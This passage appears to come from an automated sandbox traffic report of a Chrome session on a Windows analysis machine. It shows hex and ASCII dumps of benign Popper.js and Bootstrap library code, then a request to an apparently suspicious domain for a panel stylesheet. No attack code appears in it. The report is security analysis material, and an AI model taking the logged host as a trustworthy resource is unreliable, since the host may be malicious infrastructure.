                                                                  Data Ascii: l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 3d 63 28 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62
                                                                  Data Ascii: =c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 68 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20
                                                                  Data Ascii: ht,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d
                                                                  Data Ascii: console.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e=
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 73 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f
                                                                  Data Ascii: s(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 6d 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28
                                                                  Data Ascii: me;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 74 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75
                                                                  Data Ascii: t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}fu
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 69 29 7b 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d
                                                                  Data Ascii: i){return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=argum


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.458498104.18.11.207443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC382OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                  Host: maxcdn.bootstrapcdn.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:34 UTC966INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:34 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CDN-PullZone: 252412
                                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                  CDN-RequestCountryCode: US
                                                                  Vary: Accept-Encoding
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=31919000
                                                                  ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                  Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                  CDN-ProxyVer: 1.06
                                                                  CDN-RequestPullSuccess: True
                                                                  CDN-RequestPullCode: 200
                                                                  CDN-CachedAt: 12/04/2024 01:55:10
                                                                  CDN-EdgeStorageId: 1067
                                                                  timing-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  X-Content-Type-Options: nosniff
                                                                  CDN-Status: 200
                                                                  CDN-RequestTime: 0
                                                                  CDN-RequestId: 55ff1487c6071501927da70bb950f7b5
                                                                  CDN-Cache: HIT
                                                                  CF-Cache-Status: HIT
                                                                  Age: 207134
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533516e3642a6-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:34 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                  Data Ascii: 7bed/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e
                                                                  Data Ascii: ine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defin
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c
                                                                  Data Ascii: function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isEl
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 20 65 3d 6f 2e 45 76 65 6e 74 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73
                                                                  Data Ascii: e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._des
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 26 70 28 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74
                                                                  Data Ascii: &p(s).removeClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 6d 6f 75 73 65 65 6e 74 65 72 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d
                                                                  Data Ascii: mouseenter"+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64
                                                                  Data Ascii: l),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d
                                                                  Data Ascii: (!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)}
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 74 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d
                                                                  Data Ascii: t(d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).rem
                                                                  2024-12-30 21:42:34 UTC1369INData Raw: 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73
                                                                  Data Ascii: DATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collaps


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  41192.168.2.458499188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:34 UTC1360OUTGET /vfd23ced/assets/mePanel.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
